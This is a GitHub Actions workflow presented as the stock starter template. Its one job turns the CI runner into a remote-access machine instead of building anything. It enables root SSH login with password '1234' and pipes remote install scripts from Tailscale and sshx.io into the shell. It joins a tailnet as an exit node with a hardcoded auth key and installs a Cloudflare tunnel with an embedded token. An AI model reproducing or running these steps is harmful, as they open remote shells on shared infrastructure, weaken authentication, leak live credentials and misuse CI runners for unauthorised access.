# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v4

      - name: Run a multi-line script
        run: |
          sudo hostnamectl set-hostname testing
          CONFIG_FILE="/etc/ssh/sshd_config"
          sudo sed -i '/^PermitRootLogin/d' "$CONFIG_FILE"
          sudo sed -i '/^PasswordAuthentication/d' "$CONFIG_FILE"
          sudo echo "PermitRootLogin yes" >> "$CONFIG_FILE"
          sudo echo "PasswordAuthentication yes" >> "$CONFIG_FILE"
          sudo systemctl restart ssh
          sudo echo "root:1234" | chpasswd
          curl -fsSL https://tailscale.com/install.sh | sh && sudo tailscale up --auth-key=tskey-auth-kBDGvpUUTh11CNTRL-FjLMD36bN2Cjtr85HbLV2CUoU9jZvrph --advertise-exit-node
          # Add cloudflare gpg key
          sudo mkdir -p --mode=0755 /usr/share/keyrings
          curl -fsSL https://pkg.cloudflare.com/cloudflare-public-v2.gpg | sudo tee /usr/share/keyrings/cloudflare-public-v2.gpg >/dev/null
          # Add this repo to your apt repositories
           echo 'deb [signed-by=/usr/share/keyrings/cloudflare-public-v2.gpg] https://pkg.cloudflare.com/cloudflared any main' | sudo tee /etc/apt/sources.list.d/cloudflared.list
          # install cloudflared
          sudo apt-get update && sudo apt-get install cloudflared
          sudo cloudflared service install eyJhIjoiYmI3Mzg1ZmVmZWQxNjViNzdiMDA4ODU1YmM0NTc2OWMiLCJ0IjoiNjIzMWY0ZTYtYzJmMS00NDM1LWJkY2EtZTk1M2NhOWQ0NGJlIiwicyI6Ik1ETmxaalU1T0dJdE1UVXlZaTAwTm1Zd0xXSmlOalF0T0RJMU56VTFORGd5WlRkaSJ9
          curl -sSf https://sshx.io/get | sh -s run
          echo test, and deploy your project.
